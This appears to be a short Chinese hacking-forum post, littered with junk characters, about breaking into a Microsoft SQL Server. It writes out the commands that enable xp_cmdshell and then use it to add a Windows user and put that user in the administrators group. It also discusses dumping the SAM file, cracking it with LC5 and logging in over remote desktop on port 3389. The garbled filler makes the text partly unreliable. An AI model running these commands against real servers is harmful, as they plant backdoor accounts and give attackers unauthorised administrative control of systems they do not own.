saitojie

# p9 ]8 E; `- u0 |  L' }
, c9 @% C% f* _/ h* a3 J

7 L: x9 h! o  P& V1 `' m5 K' _于是开始找开启语句，对mssql的玩的少，不是太熟悉！
4 m4 b: _7 q$ [6 y1 F后来二少给我了语句，便去继续日之) Y( R+ {9 l1 H: C* e1 w3 \) c
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
9 p& `" s- z8 S3 t1为开启，0则为关闭！# {2 u& B$ f# ?% n* @$ o/ O
然后执行
' B# Z8 s: `, o5 r; C0 Y/ R2 ^1 YEXEC [master].[dbo].[xp_cmdshell] 'cmd /c net user xx xx /add'6 R, a+ e! O6 i- U9 A
即可/ ~) E) W- P0 S9 ]
回过头去看看，发现用户已经成功添加上了！
5 v. g9 k/ T0 w4 g- d) x% h4 o

; f, |! w  W: e( {# j. N
我就不明白BKK了，这个地方，你都已经加上用户了，为什么不直接加入到管理组里面，连接服务器的3389呢，为什么还要去下他的SAM，还用LC5去爆力破解呢！~~~~不明白！~~~( Y: d8 b" {  p2 i: y& g  ^
EXEC [master].[dbo].[xp_cmdshell] 'net localgroup administrators username /add'，难道是因为他的3389做了登陆用户的限制？